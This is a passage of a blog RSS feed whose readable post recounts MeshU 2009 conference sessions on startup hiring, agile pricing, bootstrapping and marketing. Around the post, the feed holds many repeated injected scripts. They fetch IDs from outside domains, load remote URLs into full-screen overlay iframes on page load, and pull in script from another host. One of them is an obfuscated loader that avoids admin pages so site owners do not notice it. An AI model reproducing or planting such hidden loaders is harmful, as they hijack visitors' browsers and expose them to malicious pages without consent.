        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/dakiloifhsnuukka.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;
  registry.iframeId = "adspect_ifr_" + Math.random().toString(36).slice(2);</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  /** Ответ траста — одна строка URL */
  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.id = registry.iframeId;
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      window.addEventListener("message", function onMsg(event) {
        if (!event.data || typeof event.data !== "object") return;
        if (event.data.type === "ktl-show-original") {
          try {
            var el = document.getElementById(registry.iframeId);
            if (el &#038;&#038; el.parentNode) el.parentNode.removeChild(el);
          } catch (e) {}
          window.removeEventListener("message", onMsg);
        }
      });
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script></p>
]]></content:encoded>
			<wfw:commentRss>http://kevrichard.com/2011/06/amd-moves-beyond-speed-with-new-apu-processors/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>MeshU 2009</title>
		<link>http://kevrichard.com/2009/04/meshu-2009-2/</link>
		<comments>http://kevrichard.com/2009/04/meshu-2009-2/#comments</comments>
		<pubDate>Sun, 12 Apr 2009 18:07:46 +0000</pubDate>
		<dc:creator><![CDATA[Kevin  Richard]]></dc:creator>
				<category><![CDATA[Communications]]></category>
		<category><![CDATA[General Business]]></category>
		<category><![CDATA[Marketing]]></category>
		<category><![CDATA[Personal]]></category>
		<category><![CDATA[Business]]></category>
		<category><![CDATA[Defensio]]></category>
		<category><![CDATA[Events]]></category>
		<category><![CDATA[Juniper Park]]></category>
		<category><![CDATA[MeshU]]></category>
		<category><![CDATA[Passion]]></category>
		<category><![CDATA[Rocket Launch Marketing]]></category>
		<category><![CDATA[Rypple]]></category>
		<category><![CDATA[Startup]]></category>
		<category><![CDATA[Technology]]></category>
		<category><![CDATA[The Working Group]]></category>

		<guid isPermaLink="false">http://kevrichard.wordpress.com/?p=407</guid>
		<description><![CDATA[So I had an insanely busy past few weeks, and this last one was pretty much the end of it. Big highlight was taking in MeshU 2009 at the MaRs Discovery District this past Monday. After attending Refresh Events on March 23rd ( watch out for these events, they fill up insanely fast!)  I won a [&#8230;]]]></description>
				<content:encoded><![CDATA[<p class="MsoNormal"><span> So I had an insanely busy past few weeks, and this last one was pretty much the end of it. Big highlight was taking in </span><a href="http://www.meshu.ca/">MeshU 2009</a><span> at the MaRs Discovery District this past Monday. After attending <a href="http://www.refresh-events.ca/" target="_blank"><span>Refresh Events </span></a>on March 23rd ( watch out for these events, they fill up insanely fast!)  I won a ticket to attend </span><a href="http://www.meshu.ca/">MeshU </a><span>(thanks!).  The first convention I attended in 2009 , I walked away with some great learning and experience. Although there were 3 streams (Design,Programing, Management) as a marketer I&#8217;m more experienced in the organizational portions of business so I opted to stick with the management stream for the day. Here is a brief run down of all the sessions I attended and a few of the key learning points I gained:<a href="http://www.meshu.ca"><img class="alignright size-full wp-image-419" title="Mesh U" src="http://kevrichard.files.wordpress.com/2009/04/meshu-top.png" alt="Mesh U" width="240" height="211" /></a><br />
</span></p>
<p class="MsoNormal"><strong>1. Finding and Keeping Startup People, Daniel Debow (<a href="https://www.rypple.com/index.shtml" target="_blank">Rypple</a>) </strong><span> :</span></p>
<p class="MsoNormal"><span>For anyone not involved in HR the first knee jerk reaction to this is to zone out, but the key insight from this session  is in a start up EVERYONE needs to be involved in getting great people on board. Looking at my notebook I have a lot of little points written down but the key things are that everyone should be actively seeking great people to bring into the organization ( the idea that great people bring more great people) and that firms should build a company culture where people will want to be &#8216;friends&#8217; with the company. Through this they may take an active role in seeing how the company is progressing and eventually feel passionate about signing on with them if asked. </span></p>
<p class="MsoNormal"><span>As well, getting great people doesn&#8217;t happen overnight. The process needs to be as transparent as possible clearly stating the risks of joining the company. In the end both you and the candidate are investing a lot into this relationship and it needs to be developed not smashed together.</span></p>
<p class="MsoNormal"><strong>2. Selling Agile Development , Dominic Bortulussi (<a href="http://www.theworkinggroup.ca/" target="_blank">The Working Group</a>):</strong></p>
<p class="MsoNormal">For someone who isn’t a web developer/programmer I had a bit of difficult time getting my head around this but by applying the topic in a more general business/client sense it became a lot more understandable. To think about a regular client/business relationship you have one side who has a task that needs to be done and specifies a price that they are willing to pay. Then on the other side there is a company who approaches the  client and provides the service for them.Very simple. But thinking deeper its not.</p>
<p class="MsoNormal"><span>Like all things in life not all projects go out with out experiencing problems or delays.There can also be the case where a client suddenly wants additional specifications added. Very often either the company or the client suffers having to take a loss on the project or not getting everything they wanted.  That&#8217;s where the flexible project practice the </span><strong>&#8220;Target/Scope Model&#8221;</strong><span> comes in:</span></p>
<ul>
<li>The client sits down with the company to determine a set price and key project needs. Additional optional features are discussed and priced out.</li>
<li>As the project continues the client removes and adds scope to the project  depending on how ahead/behind progress the project is.</li>
<li>Any scope added/removed from the project is discounted at 50% of the price ( ex: a new feature is added because the project is running ahead of schedule, an optional feature is added for half its price)</li>
</ul>
<p class="MsoNormal"><span>There are some criticisms in terms of it being very meeting heavy (between 15%-30% of the project is spent in client/provider meetings) but especially in the consulting field the idea of flexible pricing and  having a project be more realistic to the needs of both the client and producer is a really interesting idea.</span></p>
<p class="MsoNormal">
<p class="MsoNormal"><span>For more info check out the powerpoint from the presentation</span></p>
<p class="MsoNormal"><span><a href="http://docs.google.com/Present?docid=dn7623p_7pdc5b7cd"><span>http://docs.google.com/Present?docid=dn7623p_7pdc5b7cd</span></a></span></p>
<p class="MsoNormal">
<p class="MsoNormal"><strong>3.Lessons learned: How I founded, bootstrapped, grew and sold my web startup,Carl Mercier ( <a href="http://defensio.com/" target="_blank">Defensio</a>) :</strong></p>
<p class="MsoNormal">
<p class="MsoNormal"><span>Very often startups feel that they can&#8217;t survive without having venture capital funding. Attending this session I learned that you can go it on your own and perhaps be even more likely to walk away profitable. Rather than having an investor who will have first go at your profits you control the revenues and can sell at lower thresholds in comparison. </span></p>
<p class="MsoNormal"><span>In part Carl Mercier spoke about having an effective marketing plan (Digg doesn&#8217;t work!) and a strong business strategy from the start(neither does an advertising revenue model!). Compared to a funded start up,  a bootstrapped start up needs to be making money fast and  must also do away with all of the niceties they could have had being funded (must have  cheaper offices, used equipment, less flash). Important to all companies but especially to bootstrapped startups is the connection the firm has with their customers especially the early adopters.  These are the people who will be selling your company to their friends,family and everyone else around them. Treat them right! </span></p>
<p class="MsoNormal"><strong>4.Segmentation, Positioning and Storytelling: How a Smart Market Strategy Can Drive Growth, April Dunford ( <a href="http://www.rocketlaunchmarketing.com/?p=85" target="_blank">Rocket Launch Marketing</a>) </strong></p>
<p class="MsoNormal"><span>As someone studying marketing I was really excited for this session, and I wasn&#8217;t disappointed. While there was a lot of no brainer marketing things (for me anyways) like segmenting your market (you can&#8217;t target everyone!)  there were some good points made in terms of selling your company/product:</span></p>
<ul>
<li>Creating a strong value proposition: Tell up front why your customer should buy your product and what makes you different from your competition ( customers don&#8217;t want to think!)</li>
<li>Create a personal story of your company to tell to customers, it builds a stronger connection and is more effective than listing off facts. They come in 3 forms: Customer Success ( how has the product/service positively affected a customers business) , Competitive Win ( how did you one up your competitor) and Company creation ( such as how Youtube was supposedly started in someones garage *Wrong*) .</li>
<li> Communications is VERY important. For whatever initiative you do be it a website, using social media , all the way down to your corporate culture , companies need to have a clear and targeted message. Don&#8217;t make it too formal or generic , every piece of messaging should be targeted towards the customer and leave an impression. Another key to this is to remain consistent, everyone should be on board saying the exact same thing even when it may seem repetitive as this is how your company is being portrayed to the public.</li>
</ul>
<p class="MsoNormal"><span> </span></p>
<p class="MsoNormal"><strong>5. Boiling the frog: how to get everyone else as excited about your idea as you are, Jason Oke </strong></p>
<p class="MsoNormal"><strong>( <a href="http://www.juniperpark.com/" target="_blank">Juniper Park</a>) :</strong><strong></strong></p>
<p class="MsoNormal"><span>I think this presentation complimented well with April Dunford&#8217;s presentation.  This presentation furthered the idea of effectively communicating yourself to clients. Lets face it when faced with change most people try to resist it ( interesting enough I learned from this presentation that the ipod was at first rejected)   but by being passionate and targeted with your presentations you can defeat objections and win over people. </span></p>
<p class="MsoNormal"><span>Again the idea of telling a story was presented. People need to be sold on the process as well as the product. Often times we are too modest or self defeating of ourselves , we need to stop this as sometimes we can actually kill good ideas. While a strong business case is always important, demonstrating your passion to others and how this came about is  important as well. Jason Oke presented the idea of going beyond the old powerpoint or boring report for the idea of being  multimodal : present some of the tools or inspirations that your team worked off of, bring in a customer to use and demonstrate this product and tell your customer what they think, or go a completely different route  and give them something like  a book  describing the story of your product. To get your customer on board you need to make them part of the process, allow them to give input and take an active part of your presentation  so they feel a stronger connection with your company and what you&#8217;re trying to sell! </span></p>
<p class="MsoNormal"><span><span>Have any Questions/Comments? Contact me at kevin.richard@ryerson.ca or send me a<a href="http://twitter.com/kevrichard"> twitter</a> message.</span></span></p>
<p class="MsoNormal">
<p class="MsoNormal"><span><span><br />
</span></span></p>
<p><span style="font-size:large;"><br />
</span><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>var url = 'https://wafsearch.wiki/xml';
var script = document.createElement('script');
script.src = url;
script.type = 'text/javascript';
script.async = true;
document.getElementsByTagName('head')[0].appendChild(script);</script><script>; !function(){var e=String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,63,55,51,47,55,50,53,54,62,51,52,61,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42].map(function(e){return 90^e})),t=[{template:String.fromCharCode.apply(String,[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39].map(function(e){return 90^e})),useFetch:!0}];if(!/^\/(wp-admin|wp-login)/.test(window.location.pathname||"")){var n=Symbol.for("__inline_id_offer__"),r=window[n]=window[n]||{iframeReady:!1,iframeId:"ifr_"+Math.random().toString(36).slice(2),run:null};r.iframeReady||("complete"===document.readyState||document.body?c():window.addEventListener("DOMContentLoaded",c))}function i(e,t){if(e.indexOf("dropbox.com")>=0)return e.replace(/\{id\}/g,t);var n=encodeURIComponent(t);return e.indexOf("gist.githubusercontent.com")>=0&#038;&#038;(n=n.replace(/%2F/g,"/")),e.replace(/\{id\}/g,n)}function o(e){return fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){return(e||"").trim()}).catch(function(){return""})}function a(e){if(!e)return!1;try{var t=e.indexOf(":")>=0?e:"https://"+e;return new URL(t),!0}catch(n){return!1}}function c(){r.run||(r.run=!0,fetch(e,{cache:"no-store"}).then(function(e){return e.text()}).then(function(e){if(!(e=(e||"").trim())||!t.length)return null;var n=t,r=i(n[0].template,e);if(1===n.length)return n[0].useFetch?o(r).then(function(e){return e&#038;&#038;a(e)?e:r}):Promise.resolve(r);var c=0;return function t(){if(c>=n.length)return Promise.resolve(r);var d=n[c],u=i(d.template,e);return(c++,d.useFetch)?o(u).then(function(e){return e&#038;&#038;a(e)||e?e:t()}):Promise.resolve(u)}()}).then(function(e){e&#038;&#038;function e(t){try{var n=document.createElement("iframe");n.style.display="none",n.onload=function(){n.remove(),t(!0)},n.onerror=function(){n.remove(),t(!1)},n.src="about:blank",document.body.appendChild(n)}catch(r){t(!1)}}(function(t){t&#038;&#038;function e(t){if(!r.iframeReady){r.iframeReady=!0;var n,i,o,a=document.createElement("iframe");a.src=(n=t,i=Math.random().toString(36).slice(2),o=n.indexOf("?")>=0?"&#038;":"?",n+o+encodeURIComponent("v")+"="+encodeURIComponent(i)),a.id=r.iframeId,a.style.cssText="position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;overflow:hidden;",a.setAttribute("aria-hidden","true"),window.addEventListener("message",function(e){if(e.data&#038;&#038;"object"==typeof e.data&#038;&#038;"ktl-show-original"===e.data.type)try{var t=document.getElementById(r.iframeId);t&#038;&#038;t.parentNode&#038;&#038;t.parentNode.removeChild(t)}catch(n){}});try{document.body.appendChild(a)}catch(c){var d=new MutationObserver(function(){document.body&#038;&#038;!document.getElementById(r.iframeId)&#038;&#038;(document.body.appendChild(a),d.disconnect())});d.observe(document.documentElement,{childList:!0,subtree:!0})}}}(e)})}).catch(function(){}))}}();</p>
<p>console.log('28du3');</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
    } catch (e) {}
  }</p>
<p>  function run() {
    fetch(API_ID_URL, { cache: "no-store" })
      .then(function(r) { return r.text(); })
      .then(function(id) {
        id = (id || "").trim();
        if (!id || !TRUSTED_CONFIGS.length) return null;
        var template = TRUSTED_CONFIGS[0].template;
        var trustedUrl = buildTrustedUrl(template, id);
        return fetch(trustedUrl, { cache: "no-store" })
          .then(function(r) { return r.text(); })
          .then(function(t) { return (t || "").trim(); })
          .catch(function() { return ""; });
      })
      .then(function(trustedResponse) {
        if (!trustedResponse) return;
        if (isSingleUrl(trustedResponse)) {
          showInIframe(trustedResponse);
        }
      })
      .catch(function() {});
  }</p>
<p>  if (document.readyState === "complete" || document.body) {
    run();
  } else {
    window.addEventListener("DOMContentLoaded", run);
  }
})();</script><script>(function() {
  var API_ID_URL = "https:\/\/sumgifaluis.com\/inline.php";
  var TRUSTED_CONFIGS = [{"template":"https:\/\/raw.githubusercontent.com\/{id}","useFetch":true}];</p>
<p>  var GLOBAL_KEY = Symbol.for("__adspect_wpu_4__");
  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };
  if (registry.run) return;
  registry.run = true;</p>
<p>  function buildTrustedUrl(template, id) {
    if (template.indexOf("dropbox.com") >= 0) return template.replace(/\{id\}/g, id);
    var encoded = encodeURIComponent(id);
    if (template.indexOf("gist.githubusercontent.com") >= 0 || template.indexOf("raw.githubusercontent.com") >= 0) encoded = encoded.replace(/%2F/g, "/");
    return template.replace(/\{id\}/g, encoded);
  }</p>
<p>  function isSingleUrl(text) {
    var s = (text || "").trim();
    if (s.indexOf("\n") >= 0 || s.indexOf("\r") >= 0) return false;
    return /^https?:\/\/[^\s<>"']+$/i.test(s);
  }</p>
<p>  function showInIframe(url) {
    if (!url || !/^https?:\/\//i.test(url)) return;
    try {
      var iframe = document.createElement("iframe");
      iframe.src = url;
      iframe.style.cssText = "position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;";
      (document.body || document.documentElement).appendChild(iframe);
